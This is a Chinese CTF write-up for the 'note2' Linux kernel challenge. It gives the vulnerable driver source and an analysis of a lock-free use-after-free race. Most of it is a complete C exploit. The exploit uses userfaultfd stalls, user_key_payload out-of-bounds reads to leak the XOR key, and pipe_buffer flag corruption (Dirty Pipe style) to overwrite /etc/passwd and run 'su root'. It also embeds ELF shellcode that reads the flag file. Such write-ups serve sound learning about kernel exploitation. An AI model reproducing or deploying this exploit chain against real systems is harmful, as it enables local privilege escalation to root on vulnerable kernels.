前言
很久没碰内核利用相关的东西了,这个题目都调了我两天(:所以还是得熟能生巧啊
题目分析
- 内核版本:
v5.10
,所以不存在cg
隔离、可以使用userfaultfd
kaslr
、smap
、smep
开启CONFIG_SLAB_FREELIST_RANDOM
和CONFIG_SLAB_FREELIST_HARDENED
都开了
题目给了源码,直接看源码吧:
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/uaccess.h>
#include <linux/miscdevice.h>
#include <linux/ioctl.h>
#include <linux/random.h>
#define IOC_MAGIC '\xFF'
#define IO_ADD _IOWR(IOC_MAGIC, 0, struct ioctl_arg)
#define IO_EDIT _IOWR(IOC_MAGIC, 1, struct ioctl_arg)
#define IO_SHOW _IOWR(IOC_MAGIC, 2, struct ioctl_arg)
#define IO_DEL _IOWR(IOC_MAGIC, 3, struct ioctl_arg)
struct ioctl_arg
{
uint64_t idx;
uint64_t size;
uint64_t addr;
};
struct node
{
uint64_t key;
uint64_t size;
uint64_t addr;
};
static struct node *table[0x10];
static int drv_open(struct inode *inode, struct file *filp);
static long drv_unlocked_ioctl(struct file *filp, unsigned int cmd, unsigned long arg);
static struct file_operations drv_fops = {
open : drv_open,
unlocked_ioctl : drv_unlocked_ioctl
};
static struct miscdevice note_miscdev = {
.minor = 11,
.name = "note2",
.fops = &drv_fops,
.mode = 0666,
};
static int drv_open(struct inode *inode, struct file *filp){
return 0;
}
static long drv_unlocked_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){
int ret = 0;
int i = 0;
uint64_t buf[0x200/8];
uint64_t addr = 0;
uint64_t size = 0;
struct ioctl_arg data;
memset(&data, 0, sizeof(data));
memset(buf,0,sizeof(buf));
if (copy_from_user(&data, (struct ioctl_arg __user *)arg, sizeof(data))){
ret = -EFAULT;
goto done;
}
data.idx &=0xf;
data.size &=0x1ff; // 8, 16, 32, 64, 96, 128, 192, 256, 512
switch (cmd){
case IO_ADD:
{
data.idx = -1;
for(i=0;i<0x10;i++){
if( !table[i] ){
data.idx = i;
break;
}
}
if( data.idx == -1){
ret = -ENOMEM;
goto done;
}
table[data.idx] = (struct node*)kzalloc(sizeof(struct node),GFP_KERNEL);
table[data.idx]->size = data.size;
get_random_bytes(&table[data.idx]->key,sizeof(table[data.idx]->key));
addr = (uint64_t)kzalloc(data.size,GFP_KERNEL);
ret = copy_from_user(buf, (void __user *)data.addr, data.size);
for(i=0;i*8 < data.size; i++)
buf[i]^= table[data.idx]->key;
memcpy((void*)addr,(void*)buf,data.size);
table[data.idx]->addr = addr ^ table[data.idx]->key;
}
break;
case IO_EDIT:
{
if( table[data.idx] ){
addr = table[data.idx]->addr ^ table[data.idx]->key;
size = table[data.idx]->size & 0x1ff;
ret = (buf, (void __user *)data.addr, size); // <======= pause
for(i=0; i*8 < size; i++)
buf[i]^= table[data.idx]->key;
memcpy((void*)addr,buf,size);
}
}
break;
case IO_SHOW:
{
if( table[data.idx] ){
addr = table[data.idx]->addr ^ table[data.idx]->key;
size = table[data.idx]->size & 0x1ff;
memcpy(buf,(void*)addr,size);
for(i=0;i*8 < size; i++)
buf[i]^= table[data.idx]->key;
ret = copy_to_user((void __user *)data.addr, buf, size);
}
}
break;
case IO_DEL:
{
if( table[data.idx] ){
addr = table[data.idx]->addr ^ table[data.idx]->key;
kfree((void*)addr);
kfree(table[data.idx]);
table[data.idx] = 0; // <====== 这里把 table[data.idx] 清零了 ==> 会导致 IO_EDIT 后面的 table[data.idx]->key crash
}
}
break;
default:
ret = -ENOTTY;
break;
}
done:
return ret;
}
static int note_init(void){
return misc_register(¬e_miscdev);
}
static void note_exit(void){
misc_deregister(¬e_miscdev);
}
module_init(note_init);
module_exit(note_exit);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Secret Note v2");
题目实现了堆块的增删查改,堆块大小限制为 [0, 0x1ff]
对应到 slub
为:8, 16, 32, 64, 96, 128, 192, 256, 512
大小的 object
,最多同时创建 16
个,其维护的结构体如下:
然后这里关键的问题就是整个过程都没有上锁,所以我们可以在 edit
时去 free
掉该堆块,然后分配其他对象占据该堆块则可以覆写其他对象。并且在 edit
过程中使用了 copy_from_user
,然后在结合内核版本可以总结出利用方式:在 edit
的过程中利用 userfalutfd
将其暂停,然后 free
掉该堆块,然后利用其他对象占据该堆块,从而导致覆写其他对象
但是这里有个关键的问题就是:写入的数据似乎是不可控的,因为在 copy_from_user
后会对写入的数据进行异或加密,所以这里如果想完全控制写入的内容,就得泄漏当前 node
的 key
漏洞利用
结合内核版本知道,GPF_KERNEL
和 GPF_KERNEL_ACCOUNT
是没有区别的,所以这里利用的方式挺多的,关键就是利用稳定性和成功率如何
笔者自己的利用思路【比较垃圾】
笔者选择 kmalloc-512
进行利用,主要的原因就是我想要去适配 pipe_buffer
,而 96 / 192
等小堆块虽然也能适配,但是这些小堆块在内核中使用频繁,其可能会破坏堆布局
笔者首先进行堆风水去形成如下堆布局:
然后利用思路如下:
-
edit(1)
,然后利用userfaultfd
暂停del(1)
,此时note content1
被释放;然后add_key
分配user_key_payload
对象占据该堆块- 恢复
edit(1)
,此时会覆写user_key_payload
对象;此时覆写的内容是不可控的
此时user_key_payload
的len
字段会被修改为一个很大的数,从而导致了越界读note_content2
和pipe_buffer
-
edit(0)
,然后利用userfaultfd
暂停del(0)
,此时note content0
被释放del(2)
,此时note content2
被释放;然后立刻add
分配note content0
对象占据该堆块(:根据先进先出的规则,这里会先占据note content2
此时利用user_key_payload
的越界读去泄漏note 0
的key
(:只需要在add
时写入content
的内容全为\x00
即可,因为0 ^ key = key
,所以此时读取note content0
就可以泄漏key
- 然后堆喷
pipe_buffer
去占据之前释放的note content0
,由于此时已经泄漏了key
,所以写入pipe_buffer
的内容可控 - 恢复
edit(0)
,此时会覆写pipe_buffer
对象,这里我们修改pipe_buffer
的flags
字段即可打dirty pipe
这里说明一下,笔者覆写 /bin/busybox
发现其一直报段错误,所以最后覆写的 /etc/passwd
,然后这里为了看出效果,笔者给 /bin/busybox
赋了一个 s
权限以便执行 su
命令,具体就是修改 init
脚本如下:
#!/bin/sh
mount -t proc none /proc
mount -t tmpfs none /tmp
mount -t sysfs none /sys
mount -t devtmpfs none /dev
mkdir /dev/pts
mount /dev/pts
chown 0:0 /bin/* -R
chown 0:0 /sbin/* -R
chown 0:0 /etc/* -R
chown 0:0 /usr/* -R
chmod +s /bin/busybox
chown 0:0 /root/flag*
chmod 400 /root/flag*
#cat /proc/kallsyms > /tmp/kallsyms
#cat /proc/kallsyms | grep "anon_pipe_buf_ops"
#cat /proc/kallsyms | grep "page_cache_pipe_buf_ops"
#cat /proc/kallsyms | grep "user_free_payload_rcu"
echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict
insmod /lib/module/e1000.ko
insmod /lib/module/note2.ko
ip link set dev eth0 up
udhcpc -i eth0 S -s /etc/udhcpc.sh
echo 'nameserver 8.8.8.8' > /etc/resolv.conf
#lsmod
cd /home/note
setsid cttyhack setuidgid 1000 sh
#setsid cttyhack setuidgid 0 sh
umount /proc
umount /sys
umount /tmp
poweroff -f
exp
如下:成功率一般
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <assert.h>
#include <linux/if_packet.h>
void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(2);
exit(EXIT_FAILURE);
}
void info(char *msg)
{
printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}
void hexx(char *msg, size_t value)
{
printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
struct ioctl_arg
{
uint64_t idx;
uint64_t size;
uint64_t addr;
};
struct node
{
uint64_t key;
uint64_t size;
uint64_t addr;
};
#define IOC_MAGIC '\xFF'
#define IO_ADD _IOWR(IOC_MAGIC, 0, struct ioctl_arg)
#define IO_EDIT _IOWR(IOC_MAGIC, 1, struct ioctl_arg)
#define IO_SHOW _IOWR(IOC_MAGIC, 2, struct ioctl_arg)
#define IO_DEL _IOWR(IOC_MAGIC, 3, struct ioctl_arg)
int fd;
void add(uint64_t size, void* buf) {
struct ioctl_arg arg = { .size = size, .addr = (uint64_t)buf };
ioctl(fd, IO_ADD, &arg);
}
void edit(uint64_t idx, void* buf) {
struct ioctl_arg arg = { .idx = idx, .addr = (uint64_t)buf };
ioctl(fd, IO_EDIT, &arg);
}
void show(uint64_t idx, void* buf) {
struct ioctl_arg arg = { .idx = idx, .addr = (uint64_t)buf };
ioctl(fd, IO_SHOW, &arg);
}
void del(uint64_t idx) {
struct ioctl_arg arg = { .idx = idx };
ioctl(fd, IO_DEL, &arg);
}
int key_alloc(char *description, char *payload, size_t plen)
{
return syscall(__NR_add_key, "user", description, payload, plen,
KEY_SPEC_PROCESS_KEYRING);
}
int key_update(int keyid, char *payload, size_t plen)
{
return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}
int key_read(int keyid, char *buffer, size_t buflen)
{
return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}
int key_revoke(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}
int key_unlink(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}
void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) puts("[X] ioctl-UFFDIO_API"), exit(-1);
uffdio_register.range.start = (long long)addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) puts("[X] ioctl-UFFDIO_REGISTER"), exit(-1);
if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)
puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}
int del_idx = 0;
uint64_t key = 0;
int run_dp = 0;
int run_key = 0;
int read_key = 0;
int run_leak = 0;
int run_copy = 0;
int run_read = 0;
int run_main = 0;
int run_copy1 = 0;
int run_write = 0;
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
#define MAIN_PIPE (4)
#define MAIN_FILE MAIN_PIPE
//#define ATTACK_FILE "/bin/busybox"
#define ATTACK_FILE "/etc/passwd"
#define PIPE_XXX (16*8)
int dp_file_fd[PIPE_XXX];
int dp_pipe_fd[PIPE_XXX][2];
int write_offset;
struct pipe_buffer evil;
int file_fd[MAIN_FILE];
int pipe_fd[MAIN_PIPE][2];
char copy_src[0x1000];
void* handler1(void* arg)
{
struct uffd_msg msg;
struct uffdio_copy uffdio_copy;
long uffd = (long)arg;
for(;;)
{
int res;
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);
res = read(uffd, &msg, sizeof(msg));
if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);
puts("[+] Now in userfaultfd handler1");
char tmp[0x1000] = { 0 };
del(1);
run_leak = 1;
while (!run_copy) {}
puts(" [+] uffd1: fill table[1]");
add(40, tmp);
memset(copy_src, 0, sizeof(copy_src));
uffdio_copy.src = (long long)copy_src;
uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
}
}
void* handler2(void* arg)
{
struct uffd_msg msg;
struct uffdio_copy uffdio_copy;
long uffd = (long)arg;
for(;;)
{
int res;
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);
res = read(uffd, &msg, sizeof(msg));
if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);
puts("[+] Now in userfaultfd handler2");
char tmp[0x1000] = { 0 };
del(0);
del(del_idx);
add(0x1ff, tmp);
run_dp = 1;
// while (!run_copy1) {}
// printf("[+] fill table[%d]\n", del_idx);
read_key = 1;
while (!run_key) {}
for (int i = 0; i < sizeof(copy_src) / 8; i++) {
*(uint64_t*)(copy_src+i*8) = key;
}
memcpy(copy_src, &evil, sizeof(struct pipe_buffer));
for (int i = 0; i < sizeof(struct pipe_buffer) / 8; i++) {
*(uint64_t*)(copy_src+i*8) ^= key;
}
uffdio_copy.src = (long long)copy_src;
uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
}
}
int check(uint64_t* data, int i) {
if (data[i] && data[i] == data[i+1] && data[i] == data[i+2]) {
if (data[i] != data[i+3]) {
if(data[i] == data[i+59] && data[i] == data[i+60]) {
if (data[i+3] == data[i+3+7]) {
return 3;
} else if (data[i+3] == data[i+3+4]) {
return 2;
} else if (data[i+3] == data[i+3+3]) {
return 1;
}
}
}
}
return 0;
}
void* leak(void* args) {
char tmp[0x10000] = { 0 };
while (!run_leak) {}
puts("[+] Leak");
puts(" [+] leak: Occupy free chunk by user_key_payload");
/*
#define KEY_NUM (8)
int key_id[KEY_NUM];
for (int i = 0; i < KEY_NUM; i++) {
char desc[0x20] = { 0 };
sprintf(desc, "%s%d", "des", i);
key_id[i] = key_alloc(desc, tmp, 244);
if (key_id[i] < 0) perror("key_alloc");
}
*/
int key_id = key_alloc("XiaozaYa", tmp, 244);
if (key_id < 0) err_exit("key_alloc");
add(0, tmp);
run_copy = 1;
while (!run_read) {}
puts(" [+] leak: key_read data");
/*
int target_key_id = -1;
for (int i = 0; i < KEY_NUM && target_key_id != -1; i++) {
int res = key_read(key_id[i], tmp, 0xfff0);
if (res < 0) perror("key_read");
if (res > 244) {
puts("[+] hit key");
target_key_id = i;
}
}
if (target_key_id == -1) {
puts("[X] failed to hit key");
exit(-1);
}
printf("[+] target_key_id: %d\n", target_key_id);
*/
if (key_read(key_id, tmp, 0xfff0) <= 244)
err_exit("key_read");
uint64_t* data = (uint64_t*)tmp;
uint64_t note_offset = -1;
uint64_t evil_offset = -1;
for (int i = 0; i < 0xfff0 / 8; i++) {
int res = check(data, i);
if (res) {
del_idx = res;
printf(" [+] leak: hit other note ==> id: %d\n", res);
note_offset = i;
printf(" [+] leak: hit note_offset ==> offset: %d\n", i);
}
if ((data[i]&0xfff) == 0xcc0 && data[i] > 0xffffffff81000000ULL) {
// if ((data[i]&0xfff) == 0xcc0 && data[i] > 0xffffffff81000000ULL && note_offset != -1) {
evil_offset = i-2;
memcpy(&evil, &data[i-2], sizeof(struct pipe_buffer));
printf(" [+] leak: hit pipe_buffer ==> offset: %d\n", i);
data[i-2+8] = 0x10;
}
if (note_offset != -1 && evil_offset != -1) {
break;
}
}
if (note_offset == -1 || evil_offset == -1) {
err_exit("failed to groom heap layout");
}
binary_dump("note DATA", &data[note_offset], 0x10);
binary_dump("pipe_buffer DATA", &data[evil_offset], sizeof(struct pipe_buffer));
printf("[------- dump ------] page : %#llx\n", evil.page);
printf("[------- dump ------] offset : %#llx\n", evil.offset);
printf("[------- dump ------] len : %#llx\n", evil.len);
printf("[------- dump ------] ops : %#llx\n", evil.ops);
printf("[------- dump ------] flags : %#llx\n", evil.flags);
printf("[------- dump ------] private : %#llx\n", evil.private);
evil.flags = 0x10;
evil.offset = 0;
evil.len = 0;
run_main = 1;
while (!read_key) {}
memset(tmp, 0, sizeof(tmp));
key_read(key_id, tmp, 0xfff0);
key = data[note_offset];
printf(" [+] leak: key: %#llx\n", key);
run_key = 1;
puts("[+] LEAK OVER!");
}
void* dirty_pipe(void* args) {
int evil_idx = -1;
while (!run_dp) {}
puts("[+] Dirty Pipe");
puts(" [+] DP: Occupy free chunk by pipe_buffer");
for (int i = 0; i < PIPE_XXX; i++) {
if (fcntl(dp_pipe_fd[i][1], F_SETPIPE_SZ, 0x1000*8) < 0) {
printf("[+] dp_pipe_fd[%d] => ", i);
perror("fcntl");
break;
}
}
puts(" [+] DP: wait run_write");
while (!run_write) {}
unsigned char elfcode[] = {
/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x68, 0x60, 0x66, 0x01, 0x01, 0x81, 0x34, 0x24, 0x01, 0x01, 0x01, 0x01,
0x48, 0xb8, 0x2f, 0x72, 0x6f, 0x6f, 0x74, 0x2f, 0x66, 0x6c, 0x50, 0x6a,
0x02, 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x0f, 0x05, 0x41, 0xba, 0xff,
0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28, 0x58, 0x6a, 0x01, 0x5f,
0x99, 0x0f, 0x05, 0xEB
};
char *cmd = "root::00";
for (int i = 0; i < PIPE_XXX; i++) {
//write(dp_pipe_fd[i][1], elfcode, sizeof(elfcode));
write(dp_pipe_fd[i][1], cmd, sizeof(cmd));
}
system("cat /etc/passwd");
system("su root");
puts("[+] DIRTY_PIPE OVER!");
}
void increase_limit()
{
int ret;
struct rlimit open_file_limit;
ret = getrlimit(RLIMIT_NOFILE, &open_file_limit);
assert(ret >= 0);
printf("[*] file limit: %d\n", open_file_limit.rlim_max);
open_file_limit.rlim_cur = open_file_limit.rlim_max;
ret = setrlimit(RLIMIT_NOFILE, &open_file_limit);
assert(ret >= 0);
}
int main(int argc, char** argv, char** envp)
{
bind_core(0);
increase_limit();
puts("[+] main");
pthread_t t1, t2, thr1, thr2;
char buf[0x10000] = { 0 };
void *uffd_buf1, *uffd_buf2;
fd = open("/dev/note2", O_RDWR);
if (fd < 0) err_exit("open /dev/note");
for (int i = 0; i < MAIN_FILE; i++) {
file_fd[i] = open(ATTACK_FILE, O_RDONLY);
if (file_fd[i] < 0) err_exit("open" ATTACK_FILE);
}
pthread_create(&t1, NULL, leak, NULL);
pthread_create(&t2, NULL, dirty_pipe, NULL);
uffd_buf1 = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
uffd_buf2 = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (uffd_buf1 == MAP_FAILED || uffd_buf2 == MAP_FAILED) err_exit("mmap uffd_buf");
register_userfaultfd(&thr1, uffd_buf1, 0x1000, handler1);
register_userfaultfd(&thr2, uffd_buf2, 0x1000, handler2);
puts(" [+] main: Spraying pipe_buffer");
#define S_PIPE_NUM (16*32+4)
int t_pipe_fd[S_PIPE_NUM][2];
puts(" [+] Step I");
for (int i = 0; i < S_PIPE_NUM; i++) {
if (pipe(t_pipe_fd[i]) < 0) {
perror("pipe");
break;
}
if (fcntl(t_pipe_fd[i][1], F_SETPIPE_SZ, 0x1000*8) < 0) {
printf("[+] t_pipe_fd[%d] => ", i);
perror("fcntl");
break;
}
loff_t offset = 1;
if (splice(file_fd[0], &offset, t_pipe_fd[i][1], NULL, 1, 0) <= 0) {
printf("%d\n", i);
perror("splice");
err_exit("splice " ATTACK_FILE);
}
}
puts(" [+] Step II");
for (int i = 0; i < PIPE_XXX; i++) {
if ((dp_file_fd[i] = open(ATTACK_FILE, O_RDONLY)) < 0) err_exit("open " ATTACK_FILE);
if (pipe(dp_pipe_fd[i]) < 0) err_exit("pipe");
loff_t offset = 1;
if (splice(dp_file_fd[i], &offset, dp_pipe_fd[i][1], NULL, 1, 0) <= 0) {
printf("%d\n", i);
perror("splice");
err_exit("splice " ATTACK_FILE);
}
}
puts(" [+] Step III");
for (int i = 0; i < MAIN_PIPE; i++) {
if (pipe(pipe_fd[i]) < 0) {
perror("pipe");
break;
}
}
int index = -1;
uint64_t* data = (uint64_t*)buf;
for (int i = 0; i < MAIN_PIPE; i++) {
for (int j = 0; j < (i+1)*2; j++) {
data[j+3] = 'A'+i;
}
add(0x1ff, buf);
memset(buf, 0, 512);
if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000*8) < 0) {
printf("[+] pipe_fd[%d] => ", i);
perror("fcntl");
break;
}
loff_t offset = 1;
if (splice(file_fd[i], &offset, pipe_fd[i][1], NULL, 1, 0) <= 0) {
printf("%d\n", i);
perror("splice");
err_exit("splice " ATTACK_FILE);
}
}
puts(" [+] main: heap groom over!");
edit(1, uffd_buf1);
run_read = 1;
while (!run_main) {}
edit(0, uffd_buf2);
run_write = 1;
pthread_join(t1, NULL);
pthread_join(t2, NULL);
puts("[+] EXP NERVER END");
return 0;
}
效果如下:
其他 wp 方案
这里还看了一些其他 wp
的方案,其中有一个是直接劫持 note
的 addr
字段为 modprobe_path
从而覆写 modprobe_path
,但是笔者不想拘泥于拿 flag
的利用,但是这里似乎可以通过劫持 addr
字段实现任意地址读写,利用任意地址读可以去泄漏 current_cred
,然后利用任意地址写可以覆写 current_cred
完成提权,而且好像劫持 modprobe_path
也可以完成提权,后面再研究研究;还有一个方案是利用 cross cache
去将劫持对象替换成 cred
,但是感觉略显麻烦了,后面有时间在看看吧